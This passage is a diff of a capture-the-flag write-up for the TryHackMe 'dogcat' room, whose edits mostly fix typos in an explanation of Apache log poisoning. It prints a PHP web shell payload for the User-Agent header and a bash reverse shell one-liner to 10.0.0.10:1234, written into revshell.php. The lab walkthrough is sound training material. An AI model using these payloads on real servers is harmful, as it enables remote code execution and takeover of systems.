d3rb1n/d3rb1n.github.io/_writeups/thm/dogcat/index.md

 1. Set the `User-Agent` to be: `<?php system($_GET['cmd']);?>` (or `exec` or `shell_exec`, etc.)
 2. Set a query string argument like: `cmd=ls`

-The idea here is that you can URL-encode a command or series of commands in the `cmd` query string paramter, and it will be executed when the Apache server goes to get the `User-Agent` of the caller, incidentally runs our code, and then injects the output (if any) as the `User-Agent` field in the `/var/log/apache2/access.log`
+The idea here is that you can URL-encode a command or series of commands in the `cmd` query string parameter, and it will be executed when the Apache server goes to get the `User-Agent` of the caller, incidentally runs our code, and then injects the output (if any) as the `User-Agent` field in the `/var/log/apache2/access.log`

 Between special characters (e.g. `'"()$>|`, etc) and then URL-encoding the command (which you can easily do via [CyberChef](https://gchq.github.io/CyberChef/)), something wasn't quite working.
-I had a difficult type executing complex commands such as echoing out a PHP reverse shell into a file.
+I had a difficult time executing complex commands such as echoing out a PHP reverse shell into a file.
 For example this one-liner reverse shell:

 ```php
 <?php exec("/bin/bash -c 'bash -i > /dev/tcp/10.0.0.10/1234 0>&1'"); ?>
 ```

-Would need to be written to a file on the server (revshell.php), and so we need to "escape" the double-quotes, and we now also have a greater-than sign, which is a special character in HTML also:
+Would need to be written to a file on the server (`revshell.php`), and so we need to "escape" the double-quotes, and we now also have a greater-than sign, which is a special character in HTML also:

 ```bash
 echo "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/10.0.0.10/1234 0>&1'\"); ?>" > revshell.php